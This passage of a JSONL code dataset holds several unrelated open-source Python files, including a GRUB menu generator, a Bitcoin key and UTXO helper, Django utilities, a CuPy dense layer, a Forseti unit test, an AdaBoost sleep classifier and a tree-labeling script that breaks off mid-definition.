\"by\", \"Belarus\"],\n [ \"be\", \"Belgium\"],\n [ \"bt\", \"Bhutan\"],\n [ \"ba\", \"Bosnia\"],\n [ \"br\", \"Brazil\"],\n [ \"bg\", \"Bulgaria\"],\n [ \"kh\", \"Cambodia\"],\n [ \"ca\", \"Canada\"],\n [ \"es_cat\", \"Catalan\"],\n [ \"cn\", \"China\"],\n [ \"cd\", \"Congo\"],\n [ \"hr\", \"Croatia\"],\n [ \"cz\", \"Czechia\"],\n [ \"dk\", \"Denmark\"],\n [ \"us_dvorak\", \"Dvorak\"],\n [ \"epo\", \"Esperanto\"],\n [ \"ee\", \"Estonia\"],\n [ \"et\", \"Ethiopia\"],\n [ \"fo\", \"Faroes\"],\n [ \"fi\", \"Finland\"],\n [ \"fr_oss\", \"France\"],\n [ \"ge\", \"Georgia\"],\n [ \"de\", \"Germany\"],\n [ \"gh\", \"Ghana\"],\n [ \"gr\", \"Greece\"],\n [ \"gn\", \"Guinea\"],\n [ \"in_guj\", \"Gujarati\"],\n [ \"in_guru\", \"Gurmukhi\"],\n [ \"hu\", \"Hungary\"],\n [ 
\"is\", \"Iceland\"],\n [ \"in\", \"India\"],\n [ \"ir\", \"Iran\"],\n [ \"iq\", \"Iraq\"],\n [ \"ie\", \"Ireland\"],\n [ \"il\", \"Israel\"],\n [ \"it\", \"Italy\"],\n [ \"jp\", \"Japan\"],\n [ \"in_kan\", \"Kannada\"],\n [ \"kz\", \"Kazakhstan\"],\n [ \"kr\", \"Korea\"],\n [ \"tr_ku\", \"Kurdish\"],\n [ \"kg\", \"Kyrgyzstan\"],\n [ \"la\", \"Laos\"],\n [ \"latam\", \"Latin Amer.\"],\n [ \"lv\", \"Latvia\"],\n [ \"lt\", \"Lithuania\"],\n [ \"mk\", \"Macedonia\"],\n [ \"in_mal\", \"Malayalam\"],\n [ \"mv\", \"Maldives\"],\n [ \"mt\", \"Malta\"],\n [ \"mao\", \"Maori\"],\n [ \"mn\", \"Mongolia\"],\n [ \"me\", \"Montenegro\"],\n [ \"ma\", \"Morocco\"],\n [ \"mm\", \"Myanmar\"],\n [ \"np\", \"Nepal\"],\n [ \"nl\", \"Netherlands\"],\n [ \"ng\", \"Nigeria\"],\n [ \"no\", \"Norway\"],\n [ \"pk\", \"Pakistan\"],\n [ \"pl\", \"Poland\"],\n [ \"pt\", \"Portugal\"],\n [ \"ro\", \"Romania\"],\n [ \"ru\", \"Russia\"],\n [ \"fi_smi\", \"Saami (Fin.)\"],\n [ \"no_smi\", \"Saami (Nor.)\"],\n [ \"se_smi\", \"Saami (Swe.)\"],\n [ \"sn\", \"Senegal\"],\n [ \"rs\", \"Serbia\"],\n [ \"sk\", \"Slovakia\"],\n [ \"si\", \"Slovenia\"],\n [ \"za\", \"South Africa\"],\n [ \"es\", \"Spain\"],\n [ \"lk\", \"Sri Lanka\"],\n [ \"se\", \"Sweden\"],\n [ \"ch_fr\", \"Swiss French\"],\n [ \"ch\", \"Swiss German\"],\n [ \"sy\", \"Syria\"],\n [ \"tj\", \"Tajikistan\"],\n [ \"in_tam\", \"Tamil\"],\n [ \"in_tel\", \"Telugu\"],\n [ \"th\", \"Thailand\"],\n [ \"tr\", \"Turkey (Q)\"],\n [ \"tr_f\", \"Turkey (F)\"],\n [ \"tm\", \"Turkmenistan\"],\n [ \"gb\", \"English UK\"],\n [ \"us\", \"USA\"],\n [ \"us_intl\", \"USA Intl.\"],\n [ \"ua\", \"Ukraine\"],\n [ \"uz\", \"Uzbekistan\"],\n [ \"vn\", \"Vietnam\"],\n]\n\nprint(\"\"\"\\\nsubmenu \"Language Selection\" {\n\"\"\")\n\nfor shortlang, lang, name in langs:\n print(\"\"\"\\\n menuentry \"%(name)s\" {\n echo \"Switching to: $chosen\"\n set lang=%(lang)s\n set bootlang=%(lang)s\n export bootlang\n export lang\n configfile /boot/grub/grub.cfg\n }\n\"\"\" % {'name': name, 'lang': lang,})\n\nprint(\"\"\"\\\n}\n\"\"\")\n\nprint(\"\"\"\\\nsubmenu \"Keyboard Selection\" {\n\"\"\")\n\nfor keymap, name in keymaps:\n print(\"\"\"\\\n menuentry \"%(name)s\" {\n echo \"Switching to: $chosen\"\n set bootkeymap=%(keymap)s\n export bootkeymap\n configfile /boot/grub/grub.cfg\n }\n\"\"\" % {'name': name, 'keymap': keymap,})\n\nprint(\"\"\"\\\n}\n\"\"\")\n","repo_name":"StefanCristian/kogaion-molecules","sub_path":"scripts/_generate_grub_langs.py","file_name":"_generate_grub_langs.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1763565095","text":"import ecdsa\nimport hashlib\nimport json\nimport util\nimport pycoin.tx\nimport urllib2\n\n# Lambda's for hashes\nsha256 = lambda h: hashlib.sha256(h).digest()\nripemd160 = lambda h: hashlib.new(\"ripemd160\", h).digest()\nmd5 = lambda h: hashlib.md5(h).digest()\n\n# Address class handles the actual address pairs,\n# It creates them from using standard SECP256k1\n# We should review the secp256k1 code and make sure it's right for security.\n\nclass Address():\n def __init__(self, pubkey, privkey, rawPubkey, rawPrivkey):\n self.pubkey = pubkey\n self.privkey = privkey\n self.rawPrivkey = rawPrivkey\n self.rawPubkey = rawPubkey\n\n # Creates new pair and returns address object\n @classmethod\n def new(cls):\n # Generates warner ECDSA objects\n ecdsaPrivkey = ecdsa.SigningKey.generate(curve=ecdsa.curves.SECP256k1)\n ecdsaPubkey = 
ecdsaPrivkey.get_verifying_key()\n\n rawPrivkey = ecdsaPrivkey.to_string()\n rawPubkey = \"\\x00\" + ripemd160(sha256(\"\\x04\" + ecdsaPubkey.to_string()))\n pubkeyChecksum = sha256(sha256(rawPubkey))[:4]\n rawPubkey += pubkeyChecksum\n\n pubkey = util.b58encode(rawPubkey)\n privkey = \"\\x80\" + rawPrivkey\n privkeyChecksum = sha256(sha256(privkey))[:4]\n privkey = util.b58encode(privkey + privkeyChecksum)\n\n return cls(pubkey, privkey, rawPubkey, rawPrivkey)\n\n # Creates pair from JSON parsed into standard python objects and returns address object\n @classmethod\n def fromObj(cls, data):\n pubkey = data[\"pubkey\"]\n privkey = data[\"privkey\"]\n rawPubkey = data[\"rawPubkey\"].decode(\"hex\")\n rawPrivkey = data[\"rawPrivkey\"].decode(\"hex\")\n\n return cls(pubkey, privkey, rawPubkey, rawPrivkey)\n\n # Returns a dictionary of JSON-serializable standard python objects; the counterpart of the fromObj classmethod.\n def getJSONData(self):\n return {\"pubkey\":self.pubkey, \"privkey\":self.privkey, \"rawPrivkey\":self.rawPrivkey.encode(\"hex\"), \"rawPubkey\":self.rawPubkey.encode(\"hex\")}\n\n# This class represents an unspent transaction output.\nclass UTXO(object):\n def __init__(self, txhash, outindex, value, script):\n self.txhash = txhash\n self.outindex = outindex\n self.value = value\n self.script = script\n\n # I assume this outputs utxo object data as pycoin utxo data for use with pycoin send [verification needed]\n def get_pycoin_coin_source(self):\n le_txhash = self.txhash.decode('hex')[::-1]\n pycoin_txout = pycoin.tx.TxOut(self.value, self.script.decode('hex'))\n return (le_txhash, self.outindex, pycoin_txout)\n\n# Fetches UTXOs for a specific address\nclass UTXOFetcher(object):\n def get_for_address(self, address):\n url = \"http://blockchain.info/unspent?active=%s\" % address\n try:\n jsonData = urllib2.urlopen(url).read()\n data = json.loads(jsonData)\n utxos = []\n for utxo_data in data['unspent_outputs']:\n txhash = utxo_data['tx_hash'].decode('hex')[::-1].encode('hex')\n utxo = UTXO(txhash, utxo_data['tx_output_n'], utxo_data['value'], utxo_data['script'])\n utxos.append(utxo)\n return utxos\n except urllib2.HTTPError as e:\n if e.code == 500:\n return []\n else:\n raise\n\n# [verification needed]\nclass TransactionData(object):\n def __init__(self):\n self.unspent = UTXOFetcher()\n","repo_name":"vbuterin/ngcccbase","sub_path":"meat.py","file_name":"meat.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"39610229577","text":"from django.core.cache import cache\nfrom django.core.management.base import BaseCommand\n\nfrom tacticalrmm.constants import (\n AGENT_OUTAGES_LOCK,\n ORPHANED_WIN_TASK_LOCK,\n RESOLVE_ALERTS_LOCK,\n SYNC_SCHED_TASK_LOCK,\n)\n\n\nclass Command(BaseCommand):\n help = \"Clear redis celery locks. Should only be run while celery/beat is stopped.\"\n
\n\n def handle(self, *args, **kwargs):\n for key in (\n AGENT_OUTAGES_LOCK,\n ORPHANED_WIN_TASK_LOCK,\n RESOLVE_ALERTS_LOCK,\n SYNC_SCHED_TASK_LOCK,\n ):\n cache.delete(key)\n","repo_name":"amidaware/tacticalrmm","sub_path":"api/tacticalrmm/core/management/commands/clear_redis_celery_locks.py","file_name":"clear_redis_celery_locks.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":2312,"dataset":"github-code","pt":"48"} +{"seq_id":"6496638927","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 2 15:49:26 2020\n\n@author: rjn\n\"\"\"\n\nimport copy\nfrom . import Layer\nimport cupy as cp\nimport numpy as np\n\nclass Dense(Layer):\n \n \"\"\"A fully-connected NN layer.\n \n Parameters:\n -----------\n n_units: int\n The number of neurons in the layer.\n input_shape: tuple\n The expected input shape of the layer. For dense layers a single digit specifying\n the number of features of the input. Must be specified if it is the first layer in\n the network.\n \"\"\"\n \n def __init__(self, n_units : int,\n input_shape: tuple =None):\n self.input_shape = input_shape\n self.n_units = n_units\n self.trainable = True\n \n def valid_layer(self):\n \n self.output_shape = self.determin_output_shape()\n \n assert self.n_units > 0 , 'n_units should be greater than 0'\n\n def initialize(self, optimizer):\n # Initialize the weights\n self.W = cp.random.normal(loc=0.0, scale = np.sqrt(2/(self.input_shape[1] + self.n_units)), \n size = ( self.input_shape[1],self.n_units))\n self.w0 = cp.random.normal(loc=0.0, scale = np.sqrt(2/self.n_units), size = (self.n_units) )\n # Weight optimizer (named W_opt because backward_pass calls self.W_opt.update)\n self.W_opt = copy.copy(optimizer)\n\n def parameters(self):\n \n '''\n \n Returns the number of trainable parameters\n \n '''\n return np.prod(self.W.shape) + np.prod(self.w0.shape)\n \n def set_weights(self, weight):\n self.W = weight[0]\n self.w0 = weight[1]\n \n def load_parameters(self):\n \n para = {'W' : self.W,\n 'b': self.w0}\n return para\n\n def forward_pass(self, X : cp.array, training : bool ):\n '''\n \n Parameters\n ----------\n X : cp.array\n array of previous layer's data.\n training : bool\n whether to cache the input for the backward pass.\n\n Returns\n -------\n cp.array\n output array of dense.\n \n '''\n\n if training :\n self.layer_input = X.copy()\n \n return cp.dot(X, self.W) + self.w0\n\n def backward_pass(self, accum_grad : cp.array ):\n '''\n \n Parameters\n ----------\n accum_grad : cp.array\n gradient of the loss with respect to this layer's output.\n\n Returns\n -------\n cp.array\n gradient with respect to this layer's input.\n \n '''\n \n # Save weights used during forwards pass\n W = self.W\n\n if self.trainable:\n n = self.layer_input.shape[0]\n # Calculate gradient w.r.t layer weights\n \n grad_w = cp.dot(cp.asarray(self.layer_input).T, accum_grad) / n \n grad_w0 = cp.sum(accum_grad, axis=0, keepdims=True) / n\n \n cp.cuda.Stream.null.synchronize()\n \n assert grad_w.shape == self.W.shape and grad_w0.shape == self.w0.shape\n \n # Update the layer weights\n self.W , self.w0 =self.W_opt.update(w=self.W, b= self.w0 , \n grad_wrt_w= grad_w, grad_wrt_b =grad_w0)\n cp.cuda.Stream.null.synchronize()\n \n assert self.W.shape == W.shape\n # Return accumulated gradient for next layer\n # Calculated based on the weights used during the forward pass\n\n del self.layer_input , grad_w, grad_w0\n\n return accum_grad.dot(W.T)\n
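\n # Usage sketch (illustrative assumption, not part of the original file):\n # layer = Dense(n_units=64, input_shape=(None, 128))\n # layer.initialize(optimizer); out = layer.forward_pass(X, training=True)\n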
\n def determin_output_shape(self):\n \n '''\n Return the output shape of this layer\n '''\n return ( None , self.n_units)\n","repo_name":"rjnp2/deep_learning_from_scratch","sub_path":"Layers/dense.py","file_name":"dense.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25287031367","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"upload-file/\", views.UserUploadedFilesView,\n name=\"UserUploadedFilesView\"),\n # path(\"get-file/\", views.GetUserUploadedFileView, name=\"GetUserUploadedFileView\"),\n path(\"summarise-text/\", views.GetSummarisedTextView,\n name=\"GetSummarisedTextView\"),\n path('register/', views.registerView, name='RegisterView'),\n path('login/', views.loginView, name='LoginView'),\n # path('logout/', views.logoutView, name = 'LogoutView'),\n path(\"process-image-url/\", views.ProcessImageURLView,\n name=\"ProcessImageURLView\"),\n path(\"history/\", views.GetUserSummaryHistory, name=\"GetUserSummaryHistory\")\n]\n","repo_name":"CSUCI-Adv-SE/Summi","sub_path":"summIApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16718281221","text":"import unittest\nimport mock\nimport ratelimiter\n\nfrom tests.inventory.pipelines.test_data import fake_configs\nfrom tests.inventory.pipelines.test_data import fake_iam_policies\nfrom tests.unittest_utils import ForsetiTestCase\nfrom google.cloud.security.common.data_access import errors as data_access_errors\nfrom google.cloud.security.common.data_access import project_dao as proj_dao\nfrom google.cloud.security.common.gcp_api import cloud_resource_manager as crm\nfrom google.cloud.security.common.gcp_api import errors as api_errors\nfrom google.cloud.security.common.util import log_util\nfrom google.cloud.security.inventory import errors as inventory_errors\nfrom google.cloud.security.inventory.pipelines import load_projects_iam_policies_pipeline\n\n\nclass LoadProjectsIamPoliciesPipelineTest(ForsetiTestCase):\n \"\"\"Tests for the load_projects_iam_policies_pipeline.\"\"\"\n\n FAKE_PROJECT_NUMBERS = ['11111', '22222']\n\n def setUp(self):\n \"\"\"Set up.\"\"\"\n self.cycle_timestamp = '20001225T120000Z'\n self.configs = fake_configs.FAKE_CONFIGS\n self.mock_crm = mock.create_autospec(crm.CloudResourceManagerClient)\n self.mock_dao = mock.create_autospec(proj_dao.ProjectDao)\n self.pipeline = (\n load_projects_iam_policies_pipeline.LoadProjectsIamPoliciesPipeline(\n self.cycle_timestamp,\n self.configs,\n self.mock_crm,\n self.mock_dao))\n\n def test_can_transform_project_iam_policies(self):\n \"\"\"Test that project iam policies can be transformed.\"\"\"\n\n loadable_iam_policies = list(self.pipeline._transform(\n fake_iam_policies.FAKE_PROJECT_IAM_POLICY_MAP))\n self.assertEquals(\n fake_iam_policies.EXPECTED_LOADABLE_PROJECT_IAM_POLICY,\n loadable_iam_policies)\n\n def test_api_is_called_to_retrieve_org_policies(self):\n \"\"\"Test that the api is called to retrieve project policies.\"\"\"\n\n self.pipeline.dao.get_project_numbers.return_value = (\n self.FAKE_PROJECT_NUMBERS)\n self.pipeline._retrieve()\n\n self.pipeline.dao.get_project_numbers.assert_called_once_with(\n self.pipeline.RESOURCE_NAME, self.pipeline.cycle_timestamp)\n
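\n # two project numbers are stubbed, so expect one API call per project: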
\n self.assertEquals(\n 2, self.pipeline.api_client.get_project_iam_policies.call_count)\n called_args, called_kwargs = (\n self.pipeline.api_client.get_project_iam_policies.call_args_list[0])\n expected_args = (self.pipeline.RESOURCE_NAME,\n self.FAKE_PROJECT_NUMBERS[0])\n self.assertEquals(expected_args, called_args)\n\n called_args, called_kwargs = (\n self.pipeline.api_client.get_project_iam_policies.call_args_list[1])\n expected_args = (self.pipeline.RESOURCE_NAME,\n self.FAKE_PROJECT_NUMBERS[1])\n self.assertEquals(expected_args, called_args)\n\n def test_dao_error_is_handled_when_retrieving(self):\n \"\"\"Test that exceptions are handled when retrieving.\"\"\"\n\n self.pipeline.dao.get_project_numbers.side_effect = (\n data_access_errors.MySQLError('error error', mock.MagicMock()))\n\n with self.assertRaises(inventory_errors.LoadDataPipelineError):\n self.pipeline._retrieve()\n\n @mock.patch.object(\n load_projects_iam_policies_pipeline.base_pipeline, 'LOGGER')\n def test_api_error_is_handled_when_retrieving(self, mock_logger):\n \"\"\"Test that exceptions are handled when retrieving.\n\n We don't want to fail the pipeline when any one project's policies\n cannot be retrieved. We just want to log the error, and continue\n with the other projects.\n \"\"\"\n self.pipeline.dao.get_project_numbers.return_value = (\n self.FAKE_PROJECT_NUMBERS)\n self.pipeline.api_client.get_project_iam_policies.side_effect = (\n api_errors.ApiExecutionError('error error', mock.MagicMock()))\n\n results = self.pipeline._retrieve()\n self.assertEqual([], results)\n self.assertEqual(2, mock_logger.error.call_count)\n\n @mock.patch.object(\n load_projects_iam_policies_pipeline.LoadProjectsIamPoliciesPipeline,\n '_get_loaded_count')\n @mock.patch.object(\n load_projects_iam_policies_pipeline.LoadProjectsIamPoliciesPipeline,\n '_load')\n @mock.patch.object(\n load_projects_iam_policies_pipeline.LoadProjectsIamPoliciesPipeline,\n '_transform')\n @mock.patch.object(\n load_projects_iam_policies_pipeline.LoadProjectsIamPoliciesPipeline,\n '_retrieve')\n def test_subroutines_are_called_by_run(self, mock_retrieve, mock_transform,\n mock_load, mock_get_loaded_count):\n \"\"\"Test that the subroutines are called by run.\"\"\"\n\n mock_retrieve.return_value = (\n fake_iam_policies.FAKE_PROJECT_IAM_POLICY_MAP)\n mock_transform.return_value = (\n fake_iam_policies.EXPECTED_LOADABLE_PROJECT_IAM_POLICY)\n self.pipeline.run()\n\n mock_retrieve.assert_called_once_with()\n\n mock_transform.assert_called_once_with(\n fake_iam_policies.FAKE_PROJECT_IAM_POLICY_MAP)\n\n self.assertEquals(2, mock_load.call_count)\n\n # The regular data is loaded.\n called_args, called_kwargs = mock_load.call_args_list[0]\n expected_args = (\n self.pipeline.RESOURCE_NAME,\n fake_iam_policies.EXPECTED_LOADABLE_PROJECT_IAM_POLICY)\n self.assertEquals(expected_args, called_args)\n\n # The raw json data is loaded.\n called_args, called_kwargs = mock_load.call_args_list[1]\n expected_args = (\n self.pipeline.RAW_RESOURCE_NAME,\n fake_iam_policies.FAKE_PROJECT_IAM_POLICY_MAP)\n self.assertEquals(expected_args, called_args)\n\n mock_get_loaded_count.assert_called_once_with()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"joshiumang107/forseti-security","sub_path":"tests/inventory/pipelines/load_projects_iam_policies_pipeline_test.py","file_name":"load_projects_iam_policies_pipeline_test.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2542519306","text":"from sklearn.base import clone\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom tpcp import OptimizableParameter, OptimizablePipeline, cf\n\nfrom sleep_analysis.datasets.mesadataset import MesaDataset\n\n\nclass 
AdaBoostPipeline(OptimizablePipeline):\n classifier: OptimizableParameter\n\n def __init__(\n self,\n modality,\n n_estimators=50,\n learning_rate=1,\n algorithm=\"SAMME.R\",\n classifier=cf(AdaBoostClassifier(random_state=1)),\n classification_type=\"binary\",\n ):\n self.modality = modality\n self.n_estimators = n_estimators\n self.learning_rate = learning_rate\n self.algorithm = algorithm\n self.classifier = classifier\n self.epoch_length = 30\n self.classification_type = classification_type\n\n def self_optimize(self, dataset: MesaDataset, **kwargs):\n \"\"\"\n Optimization of whole trainset\n :param dataset: Dataset instance representing the whole train set with its sleep data\n \"\"\"\n # Concat whole dataset to one DataFrame\n features, ground_truth = dataset.get_concat_dataset(dataset, modality=self.modality)\n\n # set classifier parameters from GridSearchCV\n c = self._set_classifier_params(clone(self.classifier))\n\n # train classifier\n if self.classification_type == \"binary\":\n self.classifier = c.fit(features, ground_truth[\"sleep\"])\n else:\n self.classifier = c.fit(features, ground_truth[self.classification_type])\n\n return self\n\n def _set_classifier_params(self, classifier):\n params = {\n \"n_estimators\": self.n_estimators,\n \"learning_rate\": self.learning_rate,\n \"algorithm\": self.algorithm,\n }\n return classifier.set_params(**params)\n\n def run(self, datapoint: MesaDataset):\n \"\"\"\n Subject-wise classification based on trained model\n :param datapoint: Dataset instance representing the sleep data of one participant\n \"\"\"\n features = datapoint.get_features(datapoint, modality=self.modality)\n\n self.classification_ = self.classifier.predict(features)\n\n return self\n","repo_name":"mad-lab-fau/sleep_analysis","sub_path":"sleep_analysis/classification/ml_algorithms/adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"27993198267","text":"import random as random\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nfrom networkx.drawing.nx_pydot import graphviz_layout\r\n#import os\r\nimport csv\r\n\r\ndef tree_to_matrix(tree,nodes):\r\n temp = []\r\n for line in nx.generate_adjlist(tree):\r\n #line is a string separated by spaces, turn it into a list\r\n my_list = line.split(\" \")\r\n #first element is just a label, so remove it\r\n my_list.pop(0)\r\n #turn the list from strings to integers\r\n my_list = [int(i) for i in my_list]\r\n \r\n temp.append(my_list)\r\n #fill the matrix with zeroes\r\n matrix = [[0]*(nodes) for i in range(nodes)]\r\n \r\n #the ones indicate a connection\r\n #find where the ones should go\r\n for i in range(nodes):\r\n for j in range(nodes):\r\n if j in temp[i]:\r\n matrix[i][j] = 1\r\n matrix[j][i] = 1\r\n \r\n return matrix\r\n\r\ndef graph_tree(tree,id,nodes=None,seed=None,time=None,conflicts=0):\r\n plt.figure(id, figsize = (10,10))\r\n #options for making the graph look nicer\r\n pos = graphviz_layout(tree, prog=\"neato\")\r\n #pos = graphviz_layout(tree, prog=\"dot\")\r\n #pos = graphviz_layout(tree, prog=\"twopi\")\r\n \r\n nx.draw(tree,pos,node_size=900)\r\n \r\n #set z = 2 if using even/odds, else set z=1\r\n z = 1\r\n \r\n #set node labels to be strictly positive, and perhaps all odd if setting z=2\r\n node_labels = {}\r\n for u in tree.nodes():\r\n key = u\r\n value = z*(u+1) - 1\r\n node_labels[key] = value\r\n \r\n #set edge labels to be the difference 
between the nodes it connects\r\n edge_labels = {}\r\n for u,v in tree.edges():\r\n key = (u,v)\r\n value = z*abs(u-v)\r\n edge_labels[key] = value\r\n \r\n font_size = 20\r\n nx.draw_networkx_labels(tree, pos, labels = node_labels, font_size = font_size)\r\n \r\n #the 'normal' way - looks bad\r\n #nx.draw_networkx_edge_labels(tree, pos, edge_labels = edge_labels, font_size = font_size)\r\n #this alternative keeps the edge labels from rotating\r\n text = nx.draw_networkx_edge_labels(tree, pos, edge_labels = edge_labels, font_size = font_size)\r\n for _,t in text.items():\r\n t.set_rotation('horizontal')\r\n \r\n if id == 1:\r\n title = str(\"Problem graph \\n Nodes = {} \\n Seed = {}\".format(nodes,seed))\r\n # file_name = str(\"Problem_graph_{}_{}.png\".format(nodes,seed))\r\n if id == 2:\r\n title = str(\"Local solution with value {} \\n Nodes = {} \\n Seed = {} \\n Time to solve: {} seconds\".format(conflicts,nodes,seed,time))\r\n # file_name = str(\"Solution_graph_{}_{}.png\".format(nodes,seed))\r\n if id == 3:\r\n title = str(\"Global solution \\n Nodes = {} \\n Seed = {} \\n Time to solve: {} seconds\".format(nodes,seed,time))\r\n # file_name = str(\"Solution_graph_{}_{}.png\".format(nodes,seed))\r\n plt.title(title,fontsize = font_size)\r\n #my_path = os.path.dirname(__file__)\r\n plt.gcf().set_facecolor(\"#A9A9A9\")\r\n #plt.savefig(my_path + '\\\\graphs2\\\\' + file_name, bbox_inches='tight')\r\n plt.show()\r\n\r\n### Matrix manipulation\r\n\r\ndef reorder(order_matrix, tree):\r\n OM = mmult(T(order_matrix), tree)\r\n OMO = mmult(OM, order_matrix)\r\n return OMO\r\n \r\ndef mmult(a,b):\r\n product = []\r\n for i in range(N):\r\n product.append([])\r\n for j in range(N):\r\n prodsum = 0\r\n for k in range(N):\r\n prodsum += a[i][k] * b[k][j]\r\n product[i].append(prodsum)\r\n return product\r\n\r\ndef T(a):\r\n #transpose\r\n T = [[a[j][i] for j in range(N)] for i in range(N)]\r\n #credit for this solution goes to https://www.geeksforgeeks.org/transpose-matrix-single-line-python/\r\n return T\r\n\r\ndef print_matrix(matrix):\r\n max_len = 1\r\n for i in range(len(matrix)):\r\n for j in range(len(matrix[i])):\r\n this_num = matrix[i][j]\r\n if len(str(this_num)) > max_len:\r\n max_len = len(str(this_num))\r\n \r\n for i in range(len(matrix)):\r\n rowtext = \"\"\r\n for j in range(len(matrix[i])):\r\n this_num = matrix[i][j]\r\n space = max_len - len(str(this_num))\r\n rowtext = rowtext + space*' ' + str(this_num) + \" \"\r\n print(rowtext)\r\n \r\n#######################\r\n\r\ndef assignWeights(problem_matrix):\r\n #the weight of each tree will be based on the number of close neighbors\r\n #so, pick a node and find the distance to each other node\r\n #add up these distances - if it's a smaller number, that node is more central\r\n \r\n #note that the problem_matrix already notes all the distance 1's\r\n #so use it as a starting point\r\n distances = [row[:] for row in problem_matrix]\r\n for d in range(2,N):\r\n for i in range(N):\r\n distances[i][i] = -1\r\n for j in range(N):\r\n if distances[i][j] == d-1:\r\n for k in range(N):\r\n if problem_matrix[j][k] == 1 and distances[i][k] == 0:\r\n distances[i][k] = d\r\n \r\n weights = []\r\n for i in range(N):\r\n rowsum = 0\r\n for j in range(N):\r\n if distances[i][j] == -1:\r\n distances[i][j] = 0\r\n rowsum += distances[i][j]\r\n weights.append(rowsum)\r\n \r\n return weights,distances\r\n \r\ndef judge(this_list, tree, weights, distances):\r\n this_matrix = listToMatrix(this_list)\r\n newTree = reorder(this_matrix, tree)\r\n 
evaluation = conflicts(newTree)\r\n troublemakers = findTrouble(newTree)\r\n return evaluation, troublemakers\r\n \r\ndef listToMatrix(this_list):\r\n this_matrix = []\r\n for i in range(N):\r\n this_row = []\r\n for j in range(N):\r\n if this_list[i] == j:\r\n this_row.append(1)\r\n else:\r\n this_row.append(0)\r\n this_matrix.append(this_row)\r\n return this_matrix\r\n\r\ndef conflicts(tree):\r\n count = -N + 1\r\n for i in range(1,N): #start with the diagonal where C-R = 1\r\n d = 0\r\n for j in range(i,N):\r\n d += tree[j-i][j]\r\n count += d**2\r\n \r\n not_used = [1]*(N-1)\r\n for i in range(1,N): #start with the diagonal where C-R = 1\r\n for j in range(i,N):\r\n if tree[j-i][j] == 1:\r\n not_used[i-1] = 0\r\n\r\n unused_weighted = 0\r\n for i in range(1,N):\r\n unused_weighted += i * not_used[i-1]\r\n \r\n return int(count / 2), sum(not_used), unused_weighted\r\n \r\ndef findTrouble(tree):\r\n #identify where the 1s are\r\n diagonals = []\r\n rows = []\r\n cols = []\r\n for i in range(1,N):\r\n for j in range(i,N):\r\n if tree[j-i][j] == 1:\r\n diagonals.append(i)\r\n rows.append(j-i)\r\n cols.append(j)\r\n \r\n troublemakers = []\r\n for i in range(N-1):\r\n for j in range(i+1,N-1):\r\n if diagonals[i] == diagonals[j]:\r\n troublemakers.append(rows[i]) #the troublemaker lived in this row\r\n troublemakers.append(rows[j]) #the other one lived in this row\r\n #troublemakers.append(cols[i]) #need to track the cols as well because\r\n #troublemakers.append(cols[j]) # only the upper triangle was checked\r\n \r\n return troublemakers\r\n\r\ndef chooseConnection(weights, distances):\r\n # first version will always choose the best-looking candidate\r\n # but this one may not always produce a solution\r\n # so future versions should have a chance to choose the second or third best\r\n \r\n # appraisals = [x[:] for x in distances] # make a deep copy\r\n # min_value = -1\r\n # node_a = -1\r\n # node_b = -1\r\n \r\n # for a in range(N):\r\n # for b in range(N):\r\n # if appraisals[a][b] == 1:\r\n # appraisals[a][b] = weights[a] + weights[b] #plus or multiply?\r\n # if min_value == -1 or appraisals[a][b] < min_value:\r\n # min_value = appraisals[a][b]\r\n # node_a,node_b = a,b\r\n # else:\r\n # appraisals[a][b] = 0\r\n \r\n # and this is the future version\r\n # a problem: using distance is very good at finding the 'best-looking' splitting edge\r\n # but it will often choose useless leafs as the second-best-looking\r\n \r\n appraisals = []\r\n appraisal_indexes = []\r\n for a in range(N-1):\r\n for b in range(a+1,N):\r\n if distances[a][b] == 1:\r\n appraisals.append(((weights[a] + weights[b])/2)**-2)\r\n appraisal_indexes.append([a,b])\r\n \r\n appraisal_sum = sum(appraisals)\r\n r = random.random()\r\n i = 0\r\n for i in range(len(appraisals)):\r\n a = appraisals[i] / appraisal_sum\r\n if r < a:\r\n node_a,node_b = appraisal_indexes[i]\r\n break\r\n else:\r\n r -= a\r\n # print(\"Chose\",node_a,node_b)\r\n return node_a,node_b\r\n\r\ndef assignTrees(distances, node_a, node_b):\r\n # each node will be on either side of the chosen connection\r\n rowA = distances[node_a]\r\n rowB = distances[node_b]\r\n \r\n nA = 0 # these count the nodes in each sub-tree\r\n nB = 0\r\n \r\n assignments = []\r\n \r\n for i in range(N):\r\n if rowA[i] < rowB[i]:\r\n assignments.append(0)\r\n nA += 1\r\n if rowB[i] < rowA[i]:\r\n assignments.append(1)\r\n nB += 1\r\n \r\n return assignments, nA, nB\r\n\r\ndef cycleList(this_list,n):\r\n return this_list[n:] + this_list[:n]\r\n\r\n###\r\n\r\ndef 
